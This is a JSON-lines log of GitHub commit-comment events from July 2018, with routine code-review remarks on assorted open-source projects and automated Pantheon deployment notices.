{"id":"7971987252","type":"CommitCommentEvent","actor":{"login":"IceNerd"},"repo":{"name":"gravytates/hello-android"},"payload":{"comment":{"id":29724043,"position":17,"line":57,"path":"app/src/main/res/layout/activity_main.xml","commit_id":"ef441a1336ff23fe06f46d2db6abf76cfb6dac26","created_at":"2018-07-16T17:13:05Z","updated_at":"2018-07-16T17:13:05Z","author_association":"NONE","body":"or, for edittext, you can alternatively try android:placeholder=\"@string/input_one\" or similar, this shows placeholder text when no input has been provided."}},"created_at":"2018-07-16T17:13:05Z"}
{"id":"7971992621","type":"CommitCommentEvent","actor":{"login":"whyiamafool"},"repo":{"name":"theantidoteftc/ftc_app"},"payload":{"comment":{"id":29724057,"position":null,"line":null,"path":null,"commit_id":"e09695fb62fcc2f8aaecff0c914318746a0b92c8","created_at":"2018-07-16T17:14:13Z","updated_at":"2018-07-16T17:14:13Z","author_association":"COLLABORATOR","body":"Does this leave any errors on the Android Studio side?"}},"created_at":"2018-07-16T17:14:13Z"}
{"id":"7971995670","type":"CommitCommentEvent","actor":{"login":"ilovewaffels"},"repo":{"name":"Teaonly/android-eye"},"payload":{"comment":{"id":29724066,"position":null,"line":null,"path":null,"commit_id":"92fa552880efe164c0b4aff4aea362b2c7b6acde","created_at":"2018-07-16T17:14:53Z","updated_at":"2018-07-16T17:14:53Z","author_association":"NONE","body":"Shh"}},"created_at":"2018-07-16T17:14:53Z"}
{"id":"7971997144","type":"CommitCommentEvent","actor":{"login":"rbomhof"},"repo":{"name":"rbomhof/irc-d8-workflow"},"payload":{"comment":{"id":29724070,"position":null,"line":null,"path":null,"commit_id":"4befbc794b50e0b877a250e336aff99e321f1818","created_at":"2018-07-16T17:15:12Z","updated_at":"2018-07-16T17:15:12Z","author_association":"OWNER","body":"Created multidev environment [irc-d8-workflow#sep-18](https://dashboard.pantheon.io/sites/0c518be8-4ef1-48d0-bf17-f9310a806c4d#sep-18).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://sep-18-irc-d8-workflow.pantheonsite.io/)"}},"created_at":"2018-07-16T17:15:12Z"}
{"id":"7971999430","type":"CommitCommentEvent","actor":{"login":"americkson"},"repo":{"name":"RAIL-UGA/rail-uga-stellar"},"payload":{"comment":{"id":29724075,"position":null,"line":null,"path":null,"commit_id":"641ec473c0fb516cd53a5e23f11bd4b6c9f6d6df","created_at":"2018-07-16T17:15:40Z","updated_at":"2018-07-16T17:15:40Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [rail-uga-stellar#ci-378](https://dashboard.pantheon.io/sites/05f5afa3-c1ec-448f-915a-9234103f2409#ci-378).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-378-rail-uga-stellar.pantheonsite.io/)"}},"created_at":"2018-07-16T17:15:40Z"}
{"id":"7972000189","type":"CommitCommentEvent","actor":{"login":"th-otto"},"repo":{"name":"freemint/gemlib"},"payload":{"comment":{"id":29724076,"position":null,"line":null,"path":null,"commit_id":"433faa0c21e3f935195d01f0516f6f309fd359d2","created_at":"2018-07-16T17:15:49Z","updated_at":"2018-07-16T17:15:49Z","author_association":"CONTRIBUTOR","body":"The magic is that the RULES file already has a rule for doing recursive makes in $(SUBDIRS). Using double-colon rules allows specific Makefile to add rules to that. In this case, i used it to add an dependency to all-recursive in the Makefile of cflib, to specify that all-recursive also depends on the \"normal\" target, to prevent it from descending into the demo subdir before the cflib itself has been built."}},"created_at":"2018-07-16T17:15:49Z"}
{"id":"7972003919","type":"CommitCommentEvent","actor":{"login":"KathyReid"},"repo":{"name":"MycroftAI/mycroft-mark-1"},"payload":{"comment":{"id":29724081,"position":null,"line":null,"path":null,"commit_id":"05e1d550ba2420e4fd04cc2c817d79ab5bf40f5a","created_at":"2018-07-16T17:16:30Z","updated_at":"2018-07-16T17:16:30Z","author_association":"MEMBER","body":"Aaah now I understand. \r\nThe iterator in Python 2.7 is `iteritems`. In Python 3.x it is `items`. "}},"created_at":"2018-07-16T17:16:30Z"}
{"id":"7972004509","type":"CommitCommentEvent","actor":{"login":"steffen-wilke"},"repo":{"name":"gurkenlabs/litiengine"},"payload":{"comment":{"id":29724087,"position":null,"line":null,"path":null,"commit_id":"fa1961e4ec2ce663b5889eae9495a58541dd0dec","created_at":"2018-07-16T17:16:37Z","updated_at":"2018-07-16T17:16:37Z","author_association":"COLLABORATOR","body":"```java\r\n/**\r\n * @author gurkenlabs\r\n *\r\n */\r\n/**\r\n * Aaaaand btw:\r\n * @author gurkenlabs\r\n *\r\n */\r\n```"}},"created_at":"2018-07-16T17:16:37Z"}
{"id":"7972006087","type":"CommitCommentEvent","actor":{"login":"micahu"},"repo":{"name":"micahu/splitter"},"payload":{"comment":{"id":29724090,"position":10,"line":21,"path":"contracts/Splitter.sol","commit_id":"9a9241ec06d18d25d4c15cdae608e8857a9caa77","created_at":"2018-07-16T17:16:55Z","updated_at":"2018-07-16T17:16:55Z","author_association":"OWNER","body":"thanks, removing isReceiver, as the onlyReceiver modifier isn't really needed. i was using it on the withdrawal method only, but it's fine if someone calls this with 0 allowance."}},"created_at":"2018-07-16T17:16:55Z"}
{"id":"7972006648","type":"CommitCommentEvent","actor":{"login":"tsdlau"},"repo":{"name":"bostonRitualClub/tightfit"},"payload":{"comment":{"id":29724091,"position":3,"line":3,"path":"app/assets/javascripts/advertisements.js","commit_id":"d1b11fa236e3c3d3f710f3b489a2435b1af34bb9","created_at":"2018-07-16T17:17:02Z","updated_at":"2018-07-16T17:17:02Z","author_association":"CONTRIBUTOR","body":"yes. VIVA LA RESISTANCE!!!"}},"created_at":"2018-07-16T17:17:02Z"}
{"id":"7972006780","type":"CommitCommentEvent","actor":{"login":"MatthewScholefield"},"repo":{"name":"MycroftAI/mycroft-mark-1"},"payload":{"comment":{"id":29724092,"position":null,"line":null,"path":null,"commit_id":"05e1d550ba2420e4fd04cc2c817d79ab5bf40f5a","created_at":"2018-07-16T17:17:04Z","updated_at":"2018-07-16T17:17:04Z","author_association":"MEMBER","body":"Yep. Just a change we missed when transitioning to Python 3."}},"created_at":"2018-07-16T17:17:04Z"}
{"id":"7972008430","type":"CommitCommentEvent","actor":{"login":"r12a"},"repo":{"name":"aphillips/charmod-norm"},"payload":{"comment":{"id":29724096,"position":8,"line":1222,"path":"index.html","commit_id":"aa41a1ed1489df906b296ec77d680ad2467aa67d","created_at":"2018-07-16T17:17:24Z","updated_at":"2018-07-16T17:17:24Z","author_association":"NONE","body":"maintaing -> maintaining"}},"created_at":"2018-07-16T17:17:24Z"}
{"id":"7972013271","type":"CommitCommentEvent","actor":{"login":"fichtner"},"repo":{"name":"opnsense/core"},"payload":{"comment":{"id":29724114,"position":null,"line":null,"path":null,"commit_id":"6227bb9220794571b982080fb3de37128cfae718","created_at":"2018-07-16T17:18:24Z","updated_at":"2018-07-16T17:18:24Z","author_association":"MEMBER","body":"in other news: port forward, firewall rule.. works like it should... thanks for this ❤️ "}},"created_at":"2018-07-16T17:18:24Z"}
{"id":"7972013868","type":"CommitCommentEvent","actor":{"login":"tsdlau"},"repo":{"name":"bostonRitualClub/tightfit"},"payload":{"comment":{"id":29724118,"position":3,"line":3,"path":"app/assets/javascripts/advertisements.js","commit_id":"d1b11fa236e3c3d3f710f3b489a2435b1af34bb9","created_at":"2018-07-16T17:18:31Z","updated_at":"2018-07-16T17:18:31Z","author_association":"CONTRIBUTOR","body":"oh i took this out. lol"}},"created_at":"2018-07-16T17:18:31Z"}
{"id":"7972015111","type":"CommitCommentEvent","actor":{"login":"tsdlau"},"repo":{"name":"bostonRitualClub/tightfit"},"payload":{"comment":{"id":29724122,"position":3,"line":3,"path":"app/assets/javascripts/advertisements.js","commit_id":"d1b11fa236e3c3d3f710f3b489a2435b1af34bb9","created_at":"2018-07-16T17:18:48Z","updated_at":"2018-07-16T17:18:48Z","author_association":"CONTRIBUTOR","body":"at least future me is consistent with past me"}},"created_at":"2018-07-16T17:18:48Z"}
{"id":"7972016535","type":"CommitCommentEvent","actor":{"login":"matiboux"},"repo":{"name":"matiboux/MyMonitor"},"payload":{"comment":{"id":29724125,"position":null,"line":null,"path":null,"commit_id":"028d53e793b59c178ad0e86df64d6c3c89749662","created_at":"2018-07-16T17:19:06Z","updated_at":"2018-07-16T17:19:06Z","author_association":"OWNER","body":"Je comprends pas l'utilité de laisser même la possibilité de désactiver si simplement ce truc dans la config. C'est complètement idiot."}},"created_at":"2018-07-16T17:19:06Z"}
{"id":"7972017639","type":"CommitCommentEvent","actor":{"login":"lnatal"},"repo":{"name":"espressif/arduino-esp32"},"payload":{"comment":{"id":29724127,"position":null,"line":null,"path":null,"commit_id":"12ca9e8b521127c5455b8e45b463371cc0cc6d3d","created_at":"2018-07-16T17:19:19Z","updated_at":"2018-07-16T17:19:19Z","author_association":"NONE","body":"Thanks Philip!\r\nIn my Arduino instalation directory have only one file \"uart_struct.h\" in path : arduino-1.8.5\\hardware\\espressif\\esp32\\tools\\sdk\\include\\soc\\soc that have \"rd_addr\"\r\n\r\nMy code compile fine, but after lost wifi connection and reconnect , after around 256 bytes received on the serial port2, the data received looks like be \"shifted\" and can't be decoded by my routine.\r\nIt´s occour not on the moment of recconection, but after a number of bytes received (around 256 bytes), how describled above.\r\nFlush serial port don't work."}},"created_at":"2018-07-16T17:19:19Z"}
{"id":"7972020679","type":"CommitCommentEvent","actor":{"login":"tsdlau"},"repo":{"name":"bostonRitualClub/tightfit"},"payload":{"comment":{"id":29724135,"position":20,"line":113,"path":"app/controllers/cam_models_controller.rb","commit_id":"d1b11fa236e3c3d3f710f3b489a2435b1af34bb9","created_at":"2018-07-16T17:19:56Z","updated_at":"2018-07-16T17:19:56Z","author_association":"CONTRIBUTOR","body":"Yeah nice, totally makes sense - I wonder if its worth to automate that?"}},"created_at":"2018-07-16T17:19:56Z"}
{"id":"7972023071","type":"CommitCommentEvent","actor":{"login":"tsdlau"},"repo":{"name":"bostonRitualClub/tightfit"},"payload":{"comment":{"id":29724138,"position":10,"line":74,"path":"app/views/cam_models/index.html.erb","commit_id":"d1b11fa236e3c3d3f710f3b489a2435b1af34bb9","created_at":"2018-07-16T17:20:26Z","updated_at":"2018-07-16T17:20:26Z","author_association":"CONTRIBUTOR","body":"I still really don't like ads"}},"created_at":"2018-07-16T17:20:26Z"}
{"id":"7972026981","type":"CommitCommentEvent","actor":{"login":"rbomhof"},"repo":{"name":"rbomhof/irc-d8-workflow"},"payload":{"comment":{"id":29724145,"position":null,"line":null,"path":null,"commit_id":"33ebfd712a7efe123f02838c84aa24b90af506e7","created_at":"2018-07-16T17:21:16Z","updated_at":"2018-07-16T17:21:16Z","author_association":"OWNER","body":"Created multidev environment [irc-d8-workflow#master-test](https://dashboard.pantheon.io/sites/0c518be8-4ef1-48d0-bf17-f9310a806c4d#master-test).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://master-test-irc-d8-workflow.pantheonsite.io/)"}},"created_at":"2018-07-16T17:21:16Z"}
{"id":"7972028245","type":"CommitCommentEvent","actor":{"login":"americkson"},"repo":{"name":"RAIL-UGA/rail-uga-stellar"},"payload":{"comment":{"id":29724148,"position":null,"line":null,"path":null,"commit_id":"61eb24b4c5161cd491e29a02640ec7c720af1c16","created_at":"2018-07-16T17:21:32Z","updated_at":"2018-07-16T17:21:32Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [rail-uga-stellar#pr-41](https://dashboard.pantheon.io/sites/05f5afa3-c1ec-448f-915a-9234103f2409#pr-41).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-41-rail-uga-stellar.pantheonsite.io/)"}},"created_at":"2018-07-16T17:21:32Z"}
{"id":"7972034027","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29724161,"position":null,"line":null,"path":null,"commit_id":"3d3ee3a08b7e847f1ba7f4b2029fbef967e66342","created_at":"2018-07-16T17:22:44Z","updated_at":"2018-07-16T17:22:44Z","author_association":"OWNER","body":"Created multidev environment [dgreat#pr-215](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#pr-215).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-215-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-16T17:22:44Z"}
{"id":"7972035799","type":"CommitCommentEvent","actor":{"login":"drakmor"},"repo":{"name":"CasparCG/server"},"payload":{"comment":{"id":29724167,"position":null,"line":null,"path":null,"commit_id":"19e8b686c5b5653a35c77d4d9be9359e1e3ef7b5","created_at":"2018-07-16T17:23:07Z","updated_at":"2018-07-16T17:23:07Z","author_association":"CONTRIBUTOR","body":"```\r\nDWORD dwPreviousMode = 0;\r\nGetConsoleMode(hIn, &dwPreviousMode);\r\nSetConsoleMode(hIn, (dwPreviousMode & ~ENABLE_QUICK_EDIT_MODE) | ENABLE_EXTENDED_FLAGS);\r\n```"}},"created_at":"2018-07-16T17:23:07Z"}
{"id":"7972036657","type":"CommitCommentEvent","actor":{"login":"meren"},"repo":{"name":"merenlab/anvio"},"payload":{"comment":{"id":29724168,"position":null,"line":null,"path":null,"commit_id":"46e4a060da8db32f027cc526c1fec15d3b6ea9e4","created_at":"2018-07-16T17:23:18Z","updated_at":"2018-07-16T17:23:18Z","author_association":"MEMBER","body":"Perfect. I presume this solves the inspection page issues with large number of layers?"}},"created_at":"2018-07-16T17:23:18Z"}
{"id":"7972041296","type":"CommitCommentEvent","actor":{"login":"silverbg1"},"repo":{"name":"silverbg1/hello-world"},"payload":{"comment":{"id":29724176,"position":1,"line":1,"path":"README.md","commit_id":"f6d06a277b65fcdcba33b99bd581b9ad9994b6be","created_at":"2018-07-16T17:24:19Z","updated_at":"2018-07-16T17:24:19Z","author_association":"OWNER","body":"Hi world needing help\r\n"}},"created_at":"2018-07-16T17:24:19Z"}
{"id":"7972041769","type":"CommitCommentEvent","actor":{"login":"ouber23"},"repo":{"name":"QFZW/controlSys"},"payload":{"comment":{"id":29724178,"position":null,"line":null,"path":null,"commit_id":"15246843ab32a4c78870d79e8bb720c84fbd4821","created_at":"2018-07-16T17:24:25Z","updated_at":"2018-07-16T17:24:25Z","author_association":"CONTRIBUTOR","body":"地图比例需要一起协商一个解决方案\r\n"}},"created_at":"2018-07-16T17:24:25Z"}
{"id":"7972042649","type":"CommitCommentEvent","actor":{"login":"americkson"},"repo":{"name":"RAIL-UGA/rail-uga-stellar"},"payload":{"comment":{"id":29724182,"position":null,"line":null,"path":null,"commit_id":"15cbf4434375d4b6be10220fb624d44eecd46339","created_at":"2018-07-16T17:24:36Z","updated_at":"2018-07-16T17:24:36Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [rail-uga-stellar#pr-41](https://dashboard.pantheon.io/sites/05f5afa3-c1ec-448f-915a-9234103f2409#pr-41).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-41-rail-uga-stellar.pantheonsite.io/)"}},"created_at":"2018-07-16T17:24:36Z"}
{"id":"7972044726","type":"CommitCommentEvent","actor":{"login":"americkson"},"repo":{"name":"RAIL-UGA/rail-uga-stellar"},"payload":{"comment":{"id":29724185,"position":null,"line":null,"path":null,"commit_id":"0f8ac367c741026be862cd2827d2074fda88a691","created_at":"2018-07-16T17:25:04Z","updated_at":"2018-07-16T17:25:04Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [rail-uga-stellar#pr-48](https://dashboard.pantheon.io/sites/05f5afa3-c1ec-448f-915a-9234103f2409#pr-48).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-48-rail-uga-stellar.pantheonsite.io/)"}},"created_at":"2018-07-16T17:25:04Z"}
{"id":"7972067593","type":"CommitCommentEvent","actor":{"login":"schrodinger-cat"},"repo":{"name":"schrodinger-cat/markup-training"},"payload":{"comment":{"id":29724255,"position":8,"line":8,"path":"assets/sass/blocks/header.sass","commit_id":"ac3ad4b005acca8573243822448e0484a307df17","created_at":"2018-07-16T17:29:44Z","updated_at":"2018-07-16T17:29:44Z","author_association":"OWNER","body":"Плохо, глобальное переопределение всех ссылок не оч"}},"created_at":"2018-07-16T17:29:44Z"}
{"id":"7972070828","type":"CommitCommentEvent","actor":{"login":"schrodinger-cat"},"repo":{"name":"schrodinger-cat/markup-training"},"payload":{"comment":{"id":29724262,"position":8,"line":8,"path":"assets/sass/blocks/header.sass","commit_id":"ac3ad4b005acca8573243822448e0484a307df17","created_at":"2018-07-16T17:30:22Z","updated_at":"2018-07-16T17:30:22Z","author_association":"OWNER","body":"Чуть попозже отпишусь как правильно"}},"created_at":"2018-07-16T17:30:22Z"}
{"id":"7972070972","type":"CommitCommentEvent","actor":{"login":"bkpawlowski"},"repo":{"name":"KarolBrejnak/Test"},"payload":{"comment":{"id":29724263,"position":51,"line":67,"path":"src/Doors.java","commit_id":"ea48d13e0b1c5fe2b03b2613920d3a1b3434984e","created_at":"2018-07-16T17:30:24Z","updated_at":"2018-07-16T17:30:24Z","author_association":"NONE","body":"ta sama historia co wyżej. Aczkolwiek, tutaj nie musisz robić kolejnego porównania, bo zrobiłeś to wyżej - tzn. wiesz, że chcesz obsłużyć zdarzenie przeciwne, wystarczy samo else {} 👍 "}},"created_at":"2018-07-16T17:30:24Z"}
{"id":"7972073661","type":"CommitCommentEvent","actor":{"login":"lpdmagee"},"repo":{"name":"RBVI/CyPlot"},"payload":{"comment":{"id":29724310,"position":null,"line":null,"path":null,"commit_id":"629581fac4e18269149a0e58d44e1b1e5b9b428f","created_at":"2018-07-16T17:49:01Z","updated_at":"2018-07-16T17:49:01Z","author_association":"COLLABORATOR","body":"Fixed an issue where the hover would activate the wrong node. Added some non-functional html in an attempt to get a click notification. It did not work."}},"created_at":"2018-07-16T17:49:01Z"}
{"id":"7972076066","type":"CommitCommentEvent","actor":{"login":"jscho13"},"repo":{"name":"bostonRitualClub/tightfit"},"payload":{"comment":{"id":29724316,"position":10,"line":74,"path":"app/views/cam_models/index.html.erb","commit_id":"d1b11fa236e3c3d3f710f3b489a2435b1af34bb9","created_at":"2018-07-16T17:50:14Z","updated_at":"2018-07-16T17:50:14Z","author_association":"MEMBER","body":"lol okay lets take out ads"}},"created_at":"2018-07-16T17:50:14Z"}
{"id":"7972076210","type":"CommitCommentEvent","actor":{"login":"nqpz"},"repo":{"name":"diku-dk/openbanko"},"payload":{"comment":{"id":29724317,"position":null,"line":null,"path":null,"commit_id":"9b0fd0526eceead437ca8af22db35682dbba0abb","created_at":"2018-07-16T17:50:17Z","updated_at":"2018-07-16T17:50:17Z","author_association":"MEMBER","body":"Jeg har uploadet et forslag."}},"created_at":"2018-07-16T17:50:17Z"}
{"id":"7972079862","type":"CommitCommentEvent","actor":{"login":"bkpawlowski"},"repo":{"name":"KarolBrejnak/Test"},"payload":{"comment":{"id":29724338,"position":5,"line":4,"path":"src/DoorsTest.java","commit_id":"ea48d13e0b1c5fe2b03b2613920d3a1b3434984e","created_at":"2018-07-16T17:51:57Z","updated_at":"2018-07-16T17:51:57Z","author_association":"NONE","body":"Fajny pomysł z testami 👍 Poczytaj o asercjach i JUnit. Fajnie byłoby zamienić sprawdzanie logiki printowaniem na prawdziwe testy :)"}},"created_at":"2018-07-16T17:51:57Z"}
{"id":"7972082746","type":"CommitCommentEvent","actor":{"login":"xbglowx"},"repo":{"name":"lendup/consul_exporter"},"payload":{"comment":{"id":29724343,"position":48,"line":130,"path":"consul_exporter.go","commit_id":"52825b31252386bb18f794011e437566b084de26","created_at":"2018-07-16T17:53:18Z","updated_at":"2018-07-16T17:53:18Z","author_association":"NONE","body":"You didn't carry over this option."}},"created_at":"2018-07-16T17:53:18Z"}
{"id":"7972081822","type":"CommitCommentEvent","actor":{"login":"bkpawlowski"},"repo":{"name":"KarolBrejnak/Test"},"payload":{"comment":{"id":29724342,"position":null,"line":null,"path":null,"commit_id":"ea48d13e0b1c5fe2b03b2613920d3a1b3434984e","created_at":"2018-07-16T17:52:52Z","updated_at":"2018-07-16T17:52:52Z","author_association":"NONE","body":"Protip: nie wrzucaj plików binarnych jeśli nie ma takiej potrzeby - tj. plików *.class :)"}},"created_at":"2018-07-16T17:52:52Z"}
{"id":"7972085806","type":"CommitCommentEvent","actor":{"login":"dotarmin"},"repo":{"name":"CasparCG/server"},"payload":{"comment":{"id":29724346,"position":null,"line":null,"path":null,"commit_id":"1499d11d90ac8ad3a437bc2ae1746f84e6e33bc9","created_at":"2018-07-16T17:54:32Z","updated_at":"2018-07-16T17:54:32Z","author_association":"MEMBER","body":"Thank you @Julusian! :)"}},"created_at":"2018-07-16T17:54:32Z"}
{"id":"7972088594","type":"CommitCommentEvent","actor":{"login":"dreyling"},"repo":{"name":"eudaq/eudaq"},"payload":{"comment":{"id":29724351,"position":null,"line":null,"path":null,"commit_id":"dfad754c4466c29652148bb40e4f8ce351bb3b9c","created_at":"2018-07-16T17:55:39Z","updated_at":"2018-07-16T17:55:39Z","author_association":"MEMBER","body":"@msohailamjad can you please check if doing so your ttree implementation is still working? I had to do so otherwise there is a conflict in building the current online monitor, which also needs root."}},"created_at":"2018-07-16T17:55:39Z"}
{"id":"7972089458","type":"CommitCommentEvent","actor":{"login":"mchien20"},"repo":{"name":"Amherst-Statistics/IS5inR"},"payload":{"comment":{"id":29724354,"position":null,"line":null,"path":null,"commit_id":"8e0c452e0c7fc5886047d24802e7c0e7bf56399c","created_at":"2018-07-16T17:56:01Z","updated_at":"2018-07-16T17:56:01Z","author_association":"COLLABORATOR","body":"I got an error after I pushed. Not sure if it means anything, but wanted to make note of it."}},"created_at":"2018-07-16T17:56:01Z"}
{"id":"7972093065","type":"CommitCommentEvent","actor":{"login":"SimonRinguette"},"repo":{"name":"SimonRinguette/drools"},"payload":{"comment":{"id":29724362,"position":38,"line":38,"path":"kie-dmn/kie-dmn-core/src/test/resources/org/kie/dmn/core/imports/bkm-invocation-with-types-invoke.dmn","commit_id":"50de1f4ff61d8071b5970ac3078950a8f6501938","created_at":"2018-07-16T17:57:30Z","updated_at":"2018-07-16T17:57:30Z","author_association":"OWNER","body":"Changing this invocation from Payment Method Type to \"Bank Account\" works"}},"created_at":"2018-07-16T17:57:30Z"}
{"id":"7972094510","type":"CommitCommentEvent","actor":{"login":"fragglet"},"repo":{"name":"bradharding/doomretro"},"payload":{"comment":{"id":29724370,"position":null,"line":null,"path":null,"commit_id":"d9cebae42bd50237c09c00024c239f5befa3ff9c","created_at":"2018-07-16T17:58:01Z","updated_at":"2018-07-16T17:58:01Z","author_association":"CONTRIBUTOR","body":"Good job making what I'm sure was a hard decision, even if other people won't be happy about it. It's really important with projects like these to stay focused and decide what to say \"no\" to."}},"created_at":"2018-07-16T17:58:01Z"}
{"id":"7972095275","type":"CommitCommentEvent","actor":{"login":"chick"},"repo":{"name":"seldridge/firrtl"},"payload":{"comment":{"id":29724372,"position":null,"line":null,"path":null,"commit_id":"800db4f3736f1edf1dc4b1eeb7612606652425c7","created_at":"2018-07-16T17:58:20Z","updated_at":"2018-07-16T17:58:20Z","author_association":"NONE","body":"I'll pass the h/t to @ucbjrl who found the Java implementation of the ServiceLoader approach. Strange something so useful for extensibility should be so hard to find"}},"created_at":"2018-07-16T17:58:20Z"}
{"id":"7972092934","type":"CommitCommentEvent","actor":{"login":"jscho13"},"repo":{"name":"bostonRitualClub/tightfit"},"payload":{"comment":{"id":29724361,"position":10,"line":74,"path":"app/views/cam_models/index.html.erb","commit_id":"d1b11fa236e3c3d3f710f3b489a2435b1af34bb9","created_at":"2018-07-16T17:57:27Z","updated_at":"2018-07-16T17:57:27Z","author_association":"MEMBER","body":"it was worth seeing what it was like"}},"created_at":"2018-07-16T17:57:27Z"}
{"id":"7972097478","type":"CommitCommentEvent","actor":{"login":"deciduously"},"repo":{"name":"deciduously/fbp-rs"},"payload":{"comment":{"id":29724374,"position":null,"line":null,"path":null,"commit_id":"e4021376ddf16d571c4c416dbb40d38f687db160","created_at":"2018-07-16T17:59:18Z","updated_at":"2018-07-16T17:59:18Z","author_association":"OWNER","body":"My money's on all the None vals in our internal struct.  I'm not positive what Serda does with these and didn't have time to check - they *should* be skipped completely and those fields omitted from the serialized json"}},"created_at":"2018-07-16T17:59:18Z"}
{"id":"7972099150","type":"CommitCommentEvent","actor":{"login":"ryantrinkle"},"repo":{"name":"obsidiansystems/obelisk"},"payload":{"comment":{"id":29724378,"position":41,"line":71,"path":"lib/run/src/Obelisk/Run.hs","commit_id":"b345e31e26f9c7074f2992f05ab26c0aa02aa571","created_at":"2018-07-16T17:59:52Z","updated_at":"2018-07-16T17:59:52Z","author_association":"MEMBER","body":"It's very unclear what this result type is supposed to mean.  Why should runBackend do the `forkIO`?  We need to think about what meaningful responsibilities each piece of code should have.\r\n\r\nHowever, don't worry about fixing this.  I'm going to cut it up a different way; I'll show you when that's ready."}},"created_at":"2018-07-16T17:59:52Z"}
{"id":"7972100608","type":"CommitCommentEvent","actor":{"login":"xjailsonsantosx"},"repo":{"name":"xjailsonsantosx/radar-arduino-uno-r3"},"payload":{"comment":{"id":29724388,"position":null,"line":null,"path":null,"commit_id":"85542ae5d6617a2a2364a7ad14290cc522f6df9b","created_at":"2018-07-16T18:00:28Z","updated_at":"2018-07-16T18:00:28Z","author_association":"OWNER","body":"*construindo tela"}},"created_at":"2018-07-16T18:00:28Z"}
{"id":"7972101260","type":"CommitCommentEvent","actor":{"login":"razagill"},"repo":{"name":"razagill/shittydj"},"payload":{"comment":{"id":29724391,"position":13,"line":19,"path":"src/toolkit/util.ts","commit_id":"1fe69428e7afc41828289646521bb1bd22d95fcf","created_at":"2018-07-16T18:00:43Z","updated_at":"2018-07-16T18:00:43Z","author_association":"OWNER","body":"@sir-bobselot I guess typo?"}},"created_at":"2018-07-16T18:00:43Z"}
{"id":"7972102536","type":"CommitCommentEvent","actor":{"login":"carols10cents"},"repo":{"name":"sgrif/crates.io"},"payload":{"comment":{"id":29724397,"position":74,"line":74,"path":"src/job.rs","commit_id":"de9d9bf2aa177b64133ad7b1027616cfe5b458f5","created_at":"2018-07-16T18:01:20Z","updated_at":"2018-07-16T18:01:20Z","author_association":"NONE","body":"Right, but what it looks like to me is this:\r\n\r\nLine 56: job_id = None\r\nLine 57: enter transaction\r\nLine 58-64: select a job to run\r\nLine 65: save that job's ID in job_id\r\nLine 66: delete the job from the database\r\nLine 68-71: run the job\r\nLine 74: whether or not the job failed, execution gets here and job_id is `Some`, so retry this job\r\n\r\nLooking at increment_retries, I see now that it does nothing if the background job with that ID isn't found, but the way this code is structured, it's really confusing and looks like you're unconditionally retrying all jobs. Is there any way to restructure so that the logic is clearer?"}},"created_at":"2018-07-16T18:01:20Z"}
{"id":"7972104386","type":"CommitCommentEvent","actor":{"login":"Jameson13B"},"repo":{"name":"Jameson13B/front-end-project-week"},"payload":{"comment":{"id":29724405,"position":null,"line":null,"path":null,"commit_id":"a290d7545c942b16e700413ae02194508d6f6a0b","created_at":"2018-07-16T18:02:14Z","updated_at":"2018-07-16T18:02:14Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Display a list of notes](https://trello.com/c/R3kbr3Yd/1-display-a-list-of-notes)"}},"created_at":"2018-07-16T18:02:14Z"}
{"id":"7972104649","type":"CommitCommentEvent","actor":{"login":"razagill"},"repo":{"name":"razagill/shittydj"},"payload":{"comment":{"id":29724406,"position":13,"line":19,"path":"src/toolkit/util.ts","commit_id":"1fe69428e7afc41828289646521bb1bd22d95fcf","created_at":"2018-07-16T18:02:21Z","updated_at":"2018-07-16T18:02:21Z","author_association":"OWNER","body":"We have them defined as enums at `toolkit/const.ts`\r\n```\r\nPROVIDERS.YOUTUBE & PROVIDERS.BANDCAMP\r\n```"}},"created_at":"2018-07-16T18:02:21Z"}
{"id":"7972105118","type":"CommitCommentEvent","actor":{"login":"breandan"},"repo":{"name":"duckietown/gym-duckietown-agent"},"payload":{"comment":{"id":29724412,"position":5,"line":15,"path":"Dockerfile","commit_id":"52945df498a67cbba6f1c614bdffb022b0496d5b","created_at":"2018-07-16T18:02:36Z","updated_at":"2018-07-16T18:02:36Z","author_association":"MEMBER","body":"Why do we need `matplotlib`? Maybe we should consolidate a base image for the layers shared between [`duckietown-gym/docker/standalone/Dockerfile`](https://github.com/duckietown/gym-duckietown/blob/master/docker/standalone/Dockerfile#L1-L20)?"}},"created_at":"2018-07-16T18:02:36Z"}
{"id":"7972105240","type":"CommitCommentEvent","actor":{"login":"carols10cents"},"repo":{"name":"sgrif/crates.io"},"payload":{"comment":{"id":29724413,"position":74,"line":74,"path":"src/job.rs","commit_id":"de9d9bf2aa177b64133ad7b1027616cfe5b458f5","created_at":"2018-07-16T18:02:41Z","updated_at":"2018-07-16T18:02:41Z","author_association":"NONE","body":"It's especially confusing given that the doc comment for increment_retries is \"Marks that we just tried and failed to run a job.\" We didn't just try and fail to run a job..."}},"created_at":"2018-07-16T18:02:41Z"}
{"id":"7972105491","type":"CommitCommentEvent","actor":{"login":"spirinars"},"repo":{"name":"spirinars/job4j"},"payload":{"comment":{"id":29724417,"position":null,"line":null,"path":null,"commit_id":"1a0a88b4b65a6534e6373bb9161565740e1b4a7c","created_at":"2018-07-16T18:02:50Z","updated_at":"2018-07-16T18:02:50Z","author_association":"OWNER","body":"6.3. Массив заполнен true или false"}},"created_at":"2018-07-16T18:02:50Z"}
